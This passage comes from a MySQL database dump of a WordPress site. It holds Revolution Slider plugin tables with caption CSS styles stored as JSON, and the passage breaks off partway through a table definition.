\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(107,'.tp-caption.Sports-Button-Red','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"500\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#db1c22\",\"background-transparency\":\"1\",\"border-color\":\"#db1c22\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(108,'.tp-caption.Photography-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"power3.out\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"13px\",\"35px\",\"13px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(109,'.tp-caption.Newspaper-Button-2','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}');
/*!40000 ALTER TABLE `wpii_revslider_css` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_revslider_css_bkp`
--

DROP TABLE IF EXISTS `wpii_revslider_css_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_revslider_css_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `settings` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `hover` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `advanced` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `params` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=48 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_revslider_css_bkp`
--

LOCK TABLES `wpii_revslider_css_bkp` WRITE;
/*!40000 ALTER TABLE `wpii_revslider_css_bkp` DISABLE KEYS */;
INSERT INTO `wpii_revslider_css_bkp` VALUES (1,'.tp-caption.medium_grey',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"padding\":\"2px 4px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#888\",\"white-space\":\"nowrap\"}'),(2,'.tp-caption.small_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"14px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(3,'.tp-caption.medium_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(4,'.tp-caption.large_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(5,'.tp-caption.very_large_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\",\"letter-spacing\":\"-2px\"}'),(6,'.tp-caption.very_big_white',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\",\"padding\":\"0px 4px\",\"padding-top\":\"1px\",\"background-color\":\"#000\"}'),(7,'.tp-caption.very_big_black',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\",\"padding\":\"0px 4px\",\"padding-top\":\"1px\",\"background-color\":\"#fff\"}'),(8,'.tp-caption.modern_medium_fat',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(9,'.tp-caption.modern_medium_fat_white',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(10,'.tp-caption.modern_medium_light',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(11,'.tp-caption.modern_big_bluebg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#4e5b6c\",\"letter-spacing\":\"0\"}'),(12,'.tp-caption.modern_big_redbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"padding-top\":\"1px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#de543e\",\"letter-spacing\":\"0\"}'),(13,'.tp-caption.modern_small_text_dark',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#555\",\"text-shadow\":\"none\",\"font-size\":\"14px\",\"line-height\":\"22px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(14,'.tp-caption.boxshadow',NULL,NULL,NULL,'{\"-moz-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"-webkit-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\"}'),(15,'.tp-caption.black',NULL,NULL,NULL,'{\"color\":\"#000\",\"text-shadow\":\"none\"}'),(16,'.tp-caption.noshadow',NULL,NULL,NULL,'{\"text-shadow\":\"none\"}'),(17,'.tp-caption.thinheadline_dark',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"rgba(0,0,0,0.85)\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),(18,'.tp-caption.thintext_dark',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"rgba(0,0,0,0.85)\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"16px\",\"line-height\":\"26px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),(19,'.tp-caption.largeblackbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#000\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),(20,'.tp-caption.largepinkbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#db4360\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),(21,'.tp-caption.largewhitebg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#fff\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),(22,'.tp-caption.largegreenbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#67ae73\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),(23,'.tp-caption.excerpt',NULL,NULL,NULL,'{\"font-size\":\"36px\",\"line-height\":\"36px\",\"font-weight\":\"700\",\"font-family\":\"Arial\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"rgba(0, 0, 0, 1)\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"letter-spacing\":\"-1.5px\",\"padding\":\"1px 4px 0px 4px\",\"width\":\"150px\",\"white-space\":\"normal !important\",\"height\":\"auto\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 255, 255)\",\"border-style\":\"none\"}'),(24,'.tp-caption.large_bold_grey',NULL,NULL,NULL,'{\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(25,'.tp-caption.medium_thin_grey',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(26,'.tp-caption.small_thin_grey',NULL,NULL,NULL,'{\"font-size\":\"18px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(117, 117, 117)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(27,'.tp-caption.lightgrey_divider',NULL,NULL,NULL,'{\"text-decoration\":\"none\",\"background-color\":\"rgba(235, 235, 235, 1)\",\"width\":\"370px\",\"height\":\"3px\",\"background-position\":\"initial initial\",\"background-repeat\":\"initial initial\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(28,'.tp-caption.large_bold_darkblue',NULL,NULL,NULL,'{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(29,'.tp-caption.medium_bg_darkblue',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(52, 73, 94)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(30,'.tp-caption.medium_bold_red',NULL,NULL,NULL,'{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(31,'.tp-caption.medium_light_red',NULL,NULL,NULL,'{\"font-size\":\"21px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(32,'.tp-caption.medium_bg_red',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(227, 58, 12)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(33,'.tp-caption.medium_bold_orange',NULL,NULL,NULL,'{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(243, 156, 18)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(34,'.tp-caption.medium_bg_orange',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(243, 156, 18)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(35,'.tp-caption.grassfloor',NULL,NULL,NULL,'{\"text-decoration\":\"none\",\"background-color\":\"rgba(160, 179, 151, 1)\",\"width\":\"4000px\",\"height\":\"150px\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(36,'.tp-caption.large_bold_white',NULL,NULL,NULL,'{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(37,'.tp-caption.medium_light_white',NULL,NULL,NULL,'{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(38,'.tp-caption.mediumlarge_light_white',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(39,'.tp-caption.mediumlarge_light_white_center',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px 0px 0px 0px\",\"text-align\":\"center\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(40,'.tp-caption.medium_bg_asbestos',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(127, 140, 141)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(41,'.tp-caption.medium_light_black',NULL,NULL,NULL,'{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(42,'.tp-caption.large_bold_black',NULL,NULL,NULL,'{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(43,'.tp-caption.mediumlarge_light_darkblue',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(44,'.tp-caption.small_light_white',NULL,NULL,NULL,'{\"font-size\":\"17px\",\"line-height\":\"28px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(45,'.tp-caption.roundedimage',NULL,NULL,NULL,'{\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(46,'.tp-caption.large_bg_black',NULL,NULL,NULL,'{\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(0, 0, 0)\",\"padding\":\"10px 20px 15px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(47,'.tp-caption.mediumwhitebg',NULL,NULL,NULL,'{\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(255, 255, 255)\",\"padding\":\"5px 15px 10px\",\"text-shadow\":\"none\",\"border-width\":\"0px\",\"border-color\":\"rgb(0, 0, 0)\",\"border-style\":\"none\"}');
/*!40000 ALTER TABLE `wpii_revslider_css_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_revslider_layer_animations`
--

DROP TABLE IF EXISTS `wpii_revslider_layer_animations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_revslider_layer_animations` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `settings` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_revslider_layer_animations`
--

LOCK TABLES `wpii_revslider_layer_animations` WRITE;
/*!40000 ALTER TABLE `wpii_revslider_layer_animations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpii_revslider_layer_animations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_revslider_layer_animations_bkp`
--

DROP TABLE IF EXISTS `wpii_revslider_layer_animations_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_revslider_layer_animations_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `settings` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_revslider_layer_animations_bkp`
--

LOCK TABLES `wpii_revslider_layer_animations_bkp` WRITE;
/*!40000 ALTER TABLE `wpii_revslider_layer_animations_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpii_revslider_layer_animations_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_revslider_navigations`
--

DROP TABLE IF EXISTS `wpii_revslider_navigations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_revslider_navigations` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `handle` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `type` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `css` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `markup` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `settings` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_revslider_navigations`
--

LOCK TABLES `wpii_revslider_navigations` WRITE;
/*!40000 ALTER TABLE `wpii_revslider_navigations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpii_revslider_navigations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_revslider_navigations_bkp`
--

DROP TABLE IF EXISTS `wpii_revslider_navigations_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_revslider_navigations_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `handle` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `type` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `css` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `markup` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `settings` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
